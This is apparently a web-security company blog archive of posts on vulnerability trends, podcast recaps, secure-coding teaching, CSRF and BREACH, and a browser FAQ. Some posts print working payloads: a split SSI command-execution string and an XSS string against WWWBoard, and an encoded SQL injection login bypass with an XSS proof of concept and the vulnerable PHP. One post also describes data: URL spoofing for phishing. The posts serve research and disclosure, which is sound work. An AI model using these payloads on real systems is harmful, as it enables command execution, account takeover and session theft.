Tag Archives: web application security

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to take a look at their extensive collection of vulnerabilities that they have collected over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the immediate thing I notice is the nice upward trend as the web began to really take off, and then the real birth of web application vulnerabilities in the mid 2000’s. However, one thing I found that struck me as very odd was that we’re starting to see a downward trend in web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are) here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogenous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, people who use it are less likely to switch in favor of something new, which means there are fewer threats to the incumbent code to be replaced, and it’s therefore more likely that new frameworks won’t get adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, therefore obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, where they are focusing on custom web application code (e.g. your local bank, Paypal, Facebook), rather than open source code used by many websites. That means they wouldn’t be reported in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves far enough where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their life more difficult than working with the vendors directly or holding onto their vulnerabilities. The presence of more bug bounties, where researchers get paid for disclosing their newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is is an interesting trend and should be watched carefully. It could be a hybrid of a number of these issues as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit that is not expressed in the data above shows that there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning it involves a remote attacker and there is published exploit code) context-dependent attacks (e.g. tricking a user to click a malicious link) are still a leading source of compromise at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common or even more so than they have ever been. Said another way, compromises are flat or even up, and new remotely exploitable web application vulnerabilities being disclosed is down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find though, is that heavy database driven sites will start to falter if they rely on caching to protect themselves. Specifically Drupal sites tend to be fairly prone to this issue because of how Drupal is constructed, as an example.

It works by sending tons of HTTP requests using different paramater value pairs each time, to bypass caching servers like Varnish. Ultimately it’s not a good idea to ever use this kind of code as an adversary because it would be flooding from their own IP address. So instead this is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid 1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of the modern day knowledge about web application security against 20-year-old tech? So I took at look at the web-board. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beat me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

In taking a quick look there have been a number of vulns found in it over the years. Four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, this has been nearly 12 years since the last CVE was announced.

Sure enough its actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there’s all kinds of ways to sneak things by Perl regex if you allow nulls. But that second string makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS where filters prevented parts of the exploit so you had to break it up into two chunks to be executed together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into it’s required components where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days not to mention Matt’s project is on it’s deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browser more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in places all over the web in long forgotten but still functional code. We’ve inherited a lot of vulnerabilities and our knowledge has substantially increased. It’s really fascinating to see how bad things really were though, and how little security there really was when the web was in it’s infancy.

#HackerKast 11 Bonus Round: The Latest with Clickjacking!

This week Jeremiah said it was my turn to do a little demo for our bonus video. So I went back and I decided to take a look at how Adobe had handled clickjacking in various browsers. My understanding was that they had done two things to prevent users from getting access to the camera and microphone. The first was that they wouldn’t allow you to make it a 1×1 pixel iframe that otherwise hid the permissions dialog.

My second understanding was that they prevented the browser from changing the opacity of the flash movie or surrounding iframe so that the dialog wasn’t obscured from view. So I decided to try it out!

It turns out that hiding it from view using opacity is still allowed in Chrome. Chrome has chosen to use a permissions dialog to prevent the user from being duped, that comes down from the ribbon. That is a fairly good defense. I would even argue that there is nothing exploitable here. But just because something isn’t exploitable doesn’t mean it’s clear to the user what’s going on so I decided to take a look at how I would social engineer someone into giving me access to their camera and microphone.

So I created a small script that pops open the victim domain (say https://www.google.com/) so that the user can look at the URL bar and see that they are indeed on the correct domain. Popups have long been banned but only automatic ones, the ones that are user initiated are still allowed and “pop” up into an adjacent tab. Because I still have a reference to the popup window from the parent I can can easily send it somewhere else, other than Google after some time elapses.

At this point I send it to a data: URL structure, that allows me to inject data onto the page. Using a little trick to make the browser look an awful lot like they’re still on Google makes this trick super useful for phishing and other social engineering attacks, but not necessarily a vuln either. This basically claims that the charset is “https://www.google.com/” followed by a bunch of spaces, instead of “utf8″ or whatever it would normally be. That makes it look an awful lot like you’re still on Google’s site, but you are in fact seeing content from ha.ckers.org. So yeah, imagine that being a login page instead of a clickjacking page and you’ve got a good idea how an attacker would be most likely to use it.

At that point the user is presented with a semi-opaque Flash movie and asked to click twice (once to instantiate the plugin and once to allow permissions). Typically if I were really doing this I would host it on a domain like “gcams.com” or “g-camz.com” or whatever so that the dialog would look like it’s trying to include content from a related domain.

The user is far more likely to allow Google to have access to the user’s camera and microphone than ha.ckers.org, of course, and this problem is exacerbated by the fact that people are accustomed to sites including tons of other domains and sub-domains of other companies and subsidiaries. In Google’s case, googleusercontent.com, gstatic.com etc… are all such places that people have come to recognize and trust as being part of Google, but the same is true with lots of domains out there.

Anyway, yes, this is probably not a vuln, and after talking with Adobe and Chrome they agree, so don’t expect any sort of fixes from what I can gather. This is just how it works. If you want to check it out you can click here with Chrome to try the demo. I hope you enjoyed the bonus video!

Resources:
Wikipedia: Clickjacking

#HackerKast 11: WordPress XSS Vuln, $90 PlayStation 4s and CryptoPHP Backdoor

Happy Late Thanksgiving everybody! We started out this week going around talking about how thankful we are about browser insecurity, web application security, and the Texas cold front.

First story we talked about was a new crazy widespread XSS vulnerability in a WordPress Statistics “plugin” (I put plugin in quotes here because as of September 90% of sites had this WP-Statistics plugin installed, and that is down now to about 86% at the time of this post). The commenting system here is vulnerable to XSS very blatantly which leads me to be confused on how this took so long to come to light.

The proof of concept the researchers associated with this blog post was very nasty as this is a persistent XSS vulnerability. An attacker can leave a comment on a blog post, as the admin of the WordPress blog goes to approve this comment the payload will then steal that admin’s session cookies and send them to the attacker. Other possibilities include changing the current admin password, adding a new admin account, or use the plugin editor to write your own malicious PHP code and execute it instantly.

Next, we spoke about a clever less-technical business logic hack against Walmart. People were taking advantage of Walmart’s price matching clause by actually standing up fake manufacturers with lower prices. These pages would look legitimate enough but were in no way actual retailers. The most widespread use of this that caught the attention of the right folks was that people were getting PlayStation4s for $90. Robert was very upset about the fact that he heard about this after Walmart tightened their security controls.

Robert then gave us an overview of a new backdoor malware that is taking advantage of common blog plugins. These hackers were creating legitimate looking add-ons by creating near-exact mirrors of WordPress, Joomla, Drupal, etc,. plugins/themes. The attack itself is a combination of phishing and malware where they would with trick the admin of these blogs to install these near-mirror copies of the plugins with the addition of a backdoor called CryptoPHP. The solution to this is a hard age-old problem of where/who to trust a download of any sort of this code you are going to execute install.

Lastly, Jeremiah didn’t shy away from some shameless self promotion of a blog that we put out about the characteristics of what makes an attack “sophisticated.” This is an interesting blood-boiling topic for a few of us who have been around for a while. We see these press releases come out all the time that claim a recent breach was caused by a “sophisticated attack” later to find out that it was a plain vanilla SQL Injection. Jeremiah decided to step up and try to define what is needed to actually claim a sophisticated attack. This is by no means a complete list but certainly a start to which we welcome any and all feedback.

This week’s bonus footage comes from Robert who walked us through some cool research around clickjacking. Check it out!

Resources:
CryptoPHP Backdoor Hijacks Servers with Malicious Plugins and Themes
Scam Tricks Walmart into Selling $90 PS4s
Death by Comments: WordPress XSS Vuln is Biggest in Years
5 Characteristics of a ‘Sophisticated Attack’

#HackerKast 8: Recap ofJPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake being cold in Texas, we started off this week’s HackerKast, with some discussion about the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not any of their main webpages but a one-off brochureware type site to promote and organize a company-sponsored running race event.

This shift in attacker focus has been something we in the AppSec world have taken notice of and are realizing we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, happen either to be hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs On Security who was pointing out the value to attackers in targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points and cashing out. One major weakness that is pointed out here is that most of these types of services utilize a four-digit pin to get to your reward points account. Robert makes a great point here that even if they move from four-digit pins to a password system, they stop can make it more difficult to brute force, but if the bad guys find value here they’ll just update current malware strains to attack these types of accounts.

Robert then talked about a new TOR onion network version of Facebook that has begun to get set up for the sake of some anonymous usage of Facebook. There is the obvious use of people trying to browse at work without getting in trouble, but the more important use is for people in oppressive countries who want to get information out and not worry about prosecution and personal safety.

I brought up an interesting bug bounty that was shared on the blogosphere this week by a researcher named von Patrik who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug but it was certainly a cool one. The XSS was found by uploading a JSON file to a Google SEO service called Tag Manager. All of the inputs on Tag Manager were properly sanitized in the interface but they allowed you to upload this JSON file which had some additional configs and inputs for SEO tags. This file was not sanitized and an XSS injection could be stored making it persistent and via file upload. Pretty juicy stuff!

Finally we wrapped up talking about Google some more with a bypass of Gmail two-factor authentication. Specifically, the attack in question here was going after the text message implementation of the 2FA and not the tokenization app that Google puts out. There are a list of ways that this can happen but the particular, most recent, story we are talking about involves attackers calling up mobile providers and social engineering their way into accessing text messages to get the second factor token to help compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

Teaching Code in 2014

Guest post by – JD Glaser

“Wounds from a friend can be trusted, but an enemy multiplies kisses” – Proverbs 27:6

This proverb, over 2,000 years old, is directly applicable to all authors of programming material today. By avoiding security coverage, by explicitly teaching insecure examples, authors do the world at large a huge disservice by multiplying both the effect of incorrect knowledge and the development of insecure habits in developers. The teacher is the enemy when their teachings encourage poor practices through example, which ultimately bites the student in the end at no cost to the teacher. In fact, if you are skilled enough to be an effective teacher, the problem is worse than for poor teachers. Good teachers by virtue of their teaching skill greatly multiply the ‘kisses’ of poor example code that eventually becomes ‘acceptable production code’ ad infinitum.

So, to the authors of programming material everywhere, whether you write books or blogs, this article is targeted at you. By choosing to write, you have chosen to teach. Therefore you have a responsibility.

No Excuse for Demonstrating Insecure Code Examples

This is year 2014. There is simply no excuse for not demonstrating and explaining secure code within the examples of your chosen language.

Examples are critical. First, examples teach. Second, examples, one way or the other, find their way into production code. This is a simple fact with huge ramifications. Once a technique is learned, once that initial impact is made upon the mind, that newly learned technique becomes the way it is done. When you teach an insecure example, you perpetuate that poor knowledge in the world and it repeats itself again and again.

Change is difficult for everyone. Pepsi learned this the expensive way. Once people accepted that Coke was It, hundreds of millions of dollars spent on really cool advertising have not been able to change that mindset of that opinion. The mind has only one slot for number one, and Pepsi has remained second ever since. Don’t continue to enforce security in the mind as second.

Security Should Be Ingrained, Not Added

When teaching, even if you are ‘just’ calculating points on a sample graph for those new to chart programming, if any of that data comes from user supplied input via that simple AJAX call to get the user going, your sample code should filter that sample data. When you save it, your sample code should escape it for the chosen database; when you display it to the user, the sample code of your chosen language should escape it for the intended display context. When your sample data needs to be encrypted, your sample code should apply modern cryptography. There are no innocent examples anymore.

Security should be ingrained, not added. Programmers need to be trained to see security measures in line with normal functionality. In this way, they are trained to incorporate security measures initially as code is written, and also to identify when security measures are missing.

When Security Measures are removed for the sake of ‘clarity’ the student is being taught unconsciously that security makes things less clear. The student is also being trained directly by example to add security ‘later’.

Learning Node.js In 2014

Most of the latest Node.js books have some great material, but only one out of several took the time to properly teach, via integrated code examples, how to properly escape Node.js code for use with MySQL. Kudos to Pedro Teixeira, who wrote Professional Node.js from Wrox Press, for teaching proper security measures as an integral part of the lesson to those adapting to Node.js.

Contrast this with Node.js for PHP Developers from O’Reilly Press, where the examples explicitly demonstrate how to insecurely code Node.js with SQL Injection holes. The code in this book actually teaches the next new wave how to code wide open vulnerabilities to servers. Considering the rapid adoption of Node.js for server applications, and the millions who will use it, this is a real problem.

The fact that the retired legacy method of building SQL statements through insecure string concatenation was chosen by the author as the instruction method for this book really demonstrates the power of ingrained learning. Once something is learned, for good or bad, a person keeps repeating what they know for years. Again, change is difficult.

The developers taught by these code examples will build apps that we may all use at some point. The security vulnerabilities they contain will effect everyone. It makes one wonder if you are the author whose book or blog taught the person who coded the latest Home Depot penetration. This will be code that has to be retrofitted later at great time and great expense. It is not a theoretical problem. It does have a large dollar figure attached to its cost.

For some reason, authors of otherwise good material choose to avoid teaching security in an integral way. Either they are not knowledgeable about security, in which it is time to up their game, or have fallen into the ‘clarity omission’ trap. This is a wide spread practice, adopted by almost everyone, of declaring that since this ‘example code’ is not production code, insecure code is excusable, and therefore critical facts are not presented. This is a mistake with far-reaching implications.

I recently watched a popular video on PHP training from an instructor who is in all other respects a good instructor. Apparently, this video has educated at least 15,000 developers so far. In it, the author explicitly states briefly that output escaping should be done. However, in his very next statement, he declares that for the sake of brevity, the technique won’t be demonstrated, and the examples given out as part of the training do not incorporate the technique. The opportunity to ingrain the idea that output escaping is necessary, and that it should be an automated part of a developer’s toolkit, has just been lost on the majority of 15,000 students because the code to which they will later turn for reference is lacking. Most, if not all, will ignore it as a practice until mandated by an external force.

Stop the Madness

In the real world, when security is not incorporated at the beginning, it costs additional time and money to retrofit it later. This cost is never paid until a breach is announced on the front page of a news service and someone is sued for negligence. Teachers have a responsibility to teach this.

Coders code as they are taught. Coders are primarily taught through books and blog articles. Blog articles are especially critical for learning as they are the fastest way to learn the latest language technique. Therefore, bloggers are equally at fault when integrated security is absent from their examples.

The fact is that if you are a writer, you are a trainer. You are in fact training a developer how to do something over and over again. Security should be integral. Security books on their own, as secondary topics, should not be needed. Think about that.

The past decade has been spent railing against insecure programming practices, but the question needs to be asked, who is doing the teaching? And what is being taught?

You, the writer, are at the root of this widespread security problem. Again, this is 2014 and these issues have been in the spotlight for 10+ years. This is not about mistakes, or being a security expert. This is about the complete avoidance of the basics. What habit is a young programmer learning now that will effect the code going into service next year? and the years after?

The Truth Hurts

If you are still inadvertently training coders how to write blatantly insecure code, either through ignorance or omission, you have no business training others, especially if you are successful. If you want to teach, if you make money teaching programming, you need to stop the madness, educate yourself, and reverse the trend.

Write those three extra lines of filtering code and add that extra paragraph explaining the purpose. Teach developers how to see security ingrained in code.

Stop multiplying the sweet kiss of simplicity and avoidance. Stop making yourself the enemy of those who like to keep their credit cards private.

About JD
In his own words JD, “Did a brief stint of 15 years in security. Headed the development of TripWire for Windows and Foundscan. Founded NT OBJECTives, a company to scan web stuff. BlackHat speaker on Windows forensic issues. Built the Windows Forensic Toolkit and FPort, with the Department of Justice has used to help convict child pornographers.”

Raising the CSRF Bar

For years, we at WhiteHat have been recommending Tokenization as the number one protection from Cross Site Request Forgery (CSRF). Just having a token is not enough, of course, as it must be cryptographically strong, significantly random, and properly validated on the server. Can’t stress that last point enough as the first thing I try when I see a CSRF token is to empty the value out and see if the form submit is accepted as valid.

Historically the bar for “good enough” when it comes to CSRF tokens was if the token was changed at least per session.

For example: A user logs in and a token is generated & attached to their authenticated session. That token is used for that user for all sensitive/administrative forms that are to be protected against CSRF. As long as when the user is logged out and logged back in they received a new token and the old one was invalidated, that met the bar for “good enough.”

Not anymore.

Thanks to some fellow security researchers who are much smarter than I when it comes to crypto chops, (Angelo Prado, Neal Harris, and Yoel Gluck), and their latest attack on SSL (which they dubbed BREACH), that no longer suffices.

BREACH is an attack on HTTP Response compression algorithms, like gzip, which are very popular. Make your giant HTTP responses smaller, which makes them faster for your user? No brainer. Well now, thanks to the BREACH attack, within around 1000 requests an attacker can pull sensitive SSL-encrypted information from HTTP Responses — sensitive information such as… CSRF Tokens!

The bar must be raised. We now no longer allow Tokens to stay the same for an entire session if response compression is enabled. In order to combat this, CSRF Tokens need to be generated for every request/response. This way they can not be stolen by making 1000 requests against a consistent token.

TL;DR

  • Old “good enough” – CSRF Tokens unique per session
  • BREACH (BlackHat 2013)
  • New “good enough” – CSRF Tokens must be unique per request if HTTP Response compression is being used.

The Insecurity of Security Through Obscurity

The topic of SQL Injection (SQL) is well known to the security industry by now. From time to time, researchers will come across a vector so unique that it must be shared. In my case I had this gibberish — &#MU4<4+0 — turn into an exploitable vector due to some unique coding done on the developers’ end. So as all stories go, let’s start at the beginning.

When we come across a login form in a web application, there are a few go-to testing strategies. Of course the first thing I did in this case was submit a login request with a username of admin and my password was ‘ OR 1=1–. To no one’s surprise, the application responded with a message about incorrect information. However, the application did respond in an unusual way: the password field had ( QO!.>./* in it. My first thought was, “what is the slim chance they just returned to me the real admin password? It looks like it was randomly generated at least.” So, of course, I submitted another login attempt but this time I used the newly obtained value as the password. This time I got a new value returned to me on the failed login attempt: ) SL”+?+1′. Not surprisingly, they did not properly encode the HTML markup characters in this new response, so if we can figure out what is going on we can certainly get reflective Cross Site Scripting (XSS) on this login page. At this point it’s time to take my research to a smaller scale and attempt to understand what is going on here on a character-by-character level.

The next few login attempts submitted were intended to scope out what was going on. By submitting three requests with a, b, and c, it may be possible to see a bigger picture starting to emerge. The response for each appears to be the next letter in the alphabet — we got b, c, and d back in return. So as a next step, I tried to add on a bit to this knowledge. If we submit aa we should expect to get bb back. Unfortunately things are never just that easy. The application responded with b^ instead. So let’s see what happens on a much larger string composed of the same letter; this time I submitted aaaaaaaaaaaa (that’s 12 ‘a’ characters in a row), and to my surprise got this back b^c^b^b^c^b^. Now we have something to work with. Clearly there seems to be some sort of pattern emerging of how these characters are transforming — it looks like a repeating series. The first 6 characters are the same as the last 6 characters in the response.

So far we have only discussed these characters in their human readable format that you see on your keyboard. In the world of computers, they all have multiple secondary identities. One of the more common translations is their ASCII numerical equivalent. When a computer sees the letter ‘a’ the computer can also convert that character into a number, in this case 97. By giving these characters a number we may have an easier time determining what pattern is going on. These ASCII charts can be found all over the Internet and to give credit to the one I used, www.theasciicode.com.ar helped out big time here.

Since we have determined that there is a pattern repeating for every 6 characters, let’s figure out what this shift actually looks like numerically. We start off with injecting aaaaaa and as expected get back b^c^b^. But what does this look like if we used the ASCII numerical equivalent instead? Now in the computer world we are injecting 97,97,97,97,97,97 and we get back 98,94,99,94,98,94. From this view it looks like each value has its own unique shift being applied to it. Surely everyone loved matrices as much as I did in math class, so lets bust out some of that old matrix subtraction: [97,97,97,97,97,97] – [98,94,99,94,98,94] = [-1,3,-2,3,-1,3]. Now we have a series that we can apply to the ASCII numerical equivalent to what we want to inject in order to get it to reflect how we want.

Finally, its time to start forming a Proof of Concept (PoC) injection to exploit this potential XSS issue. So far we have found out that they have a repeating pattern of 6 character shifts being applied to our input and we have determined the exact shift occurring on each character. If we apply the correct character shifts to an exploitable injection, such as “><img/src=”h”onerror=alert(2)//, we would need to submit it as !A:llj.vpf<%g%mqduqrp@`odur+1,.2. Of course, seeing that alert box pop up is the visual verification that needed that we have reverse engineered what is going on.

Since we have a working PoC for XSS, lets revisit our initial testing for SQL injection. When we apply the same character shifts that we discovered to ‘ OR 1=1–, we find that it needs to be submitted as &#MU4<4+0. One of the space characters in our injection is being shifted by -1 which results in a non-printable character between the ‘U’ and the ‘4’. With the proper URL encoding applied, it would appear as %26%23MU%1F4%3C4%2B0 when being sent to the application. It was a glorious moment when I saw this application authenticate me as the admin user.

Back in the early days of the Internet and well before I even started learning about information security, this type of attack was quite popular. In current times, developers are commonly using parameterized queries properly on login forms so finding this type of issue has become quite rare. Unfortunately this particular app was not created for the US market and probably was developed by very green coders within a newly developing country. This was their attempt at encoding users passwords when we all know they should be hashed. Had this application not returned any content in the password field on failed login attempts, this SQL injection vulnerability would have remained perfectly hidden to any black box testing through this method. This highlights one of the many ways a vulnerability may exist but is obscured to those testing the application.

For those still following along, I have provided my interpretation of what the backend code may look like for this example. By flipping the + and – around I could also use this same code to properly encode my injection so that it reflects the way I wanted it too:


<!DOCTYPE html>
<html>
<body>
<form name="login" action="#" method="post">
<?php
$strinput = $_POST['password'];
$strarray = str_split($strinput);
for ($i = 0; $i < strlen($strinput); $i++) {
    if ($i % 6 == 0) {
        $strarray[$i] = chr(ord($strarray[$i]) - 1);
        }
    if ($i % 6 == 1) {
        $strarray[$i] = chr(ord($strarray[$i]) + 3);
        }
    if ($i % 6 == 2) {
        $strarray[$i] = chr(ord($strarray[$i]) - 2);
        }
    if ($i % 6 == 3) {
        $strarray[$i] = chr(ord($strarray[$i]) + 3);
        }
    if ($i % 6 == 4) {
        $strarray[$i] = chr(ord($strarray[$i]) - 1);
        }
    if ($i % 6 == 5) {
        $strarray[$i] = chr(ord($strarray[$i]) + 3);
        }
    }
$password = implode($strarray);
echo "Login:<input type=\"text\" name=\"username\" value=\"" . htmlspecialchars($_POST['username']) . "\"><br>\n";
echo "Password:<input type=\"password\" name=\"password\" value=\"" . $password . "\"><br>\n";
// --- CODE SNIP ---
$examplesqlquery = "SELECT id FROM users WHERE username='" . addslashes($_POST['username']) . "' AND password='$password'";
// --- CODE SNIP ---
?>
<input type="submit" value="submit">
</form>
</body>
</html>

Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator unitizes open source software via Chromium, don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what was required for when Aviator would be publicly available.

Chromium, of which Aviator is derived, contains a wide variety of OSS licenses. As can be seen here using aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD, or BSD-like licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first. Doing so is a big decision that shouldn’t be taken lightly. Of course, when and/if we make a change to the GPL or similar licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive and requests for a Windows, Linux and even open source versions are pouring in, so we are definitely determining where to focus our resources on what should come next, but there is not definite timeframe yet of when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both myself, and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed the risks of browser security around the world. A big part of Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat many people ask us what browser we use. Individually our answer has been, “mine.” Now we can be more specific: that browser is Aviator. A browser we feel confident in using not only for our own security and privacy, but one we may confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Popup blockers used to work wonders, but advertisers switched to sourcing in JavaScript and actually putting content on the page. They no longer have to physically create a new window because they can take over the entire page. Using Aviator, the user’s browser doesn’t even make the connection to an advertising networks’ servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a Beta through the Mac Store. Browsers attempt to take advantage of the fastest method of rendering they can. These APIs are sometimes unsupported by the OS and are called “private APIs”. Apple does not support these APIs because they may change and they don’t want to be held accountable for when things break. As a result, while they allow people to use their undocumented and highly speed private APIs, they don’t allow people to distribute applications that use private APIs. We can speculate the reason being that users are likely to think it’s Apple’s fault as opposed to the program when things break. So after about a month of wrestling with it, we decided that for now, we’d avoid using the Mac Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Why is Aviator’s application directory world-writable?

During the development process all of our developers were on dedicated computers, not shared computers. So this was an oversight brought on by the fact that there was no need to hide data from one another and therefore chmod permissions were too lax as source files were being copied and edited. This wouldn’t have been an issue if the permissions had been changed back to their less permissive state, but it was missed. We will get it fixed in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute, first you say, “if you aren’t paying you are the product,” then you offer a free browser?
Fair point. Like we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees and is not an official company “product.” Those outside the company asked if they could use the same browser that we do. Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the mean time, we’re mostly interested in offering a browser that security and privacy-conscious people want to use.

Have you gotten and feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though there has been some feedback from various employees of those vendors shared informally over Twitter. Some feedback has been positive, others negative. In either case, we’re most interested in server the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.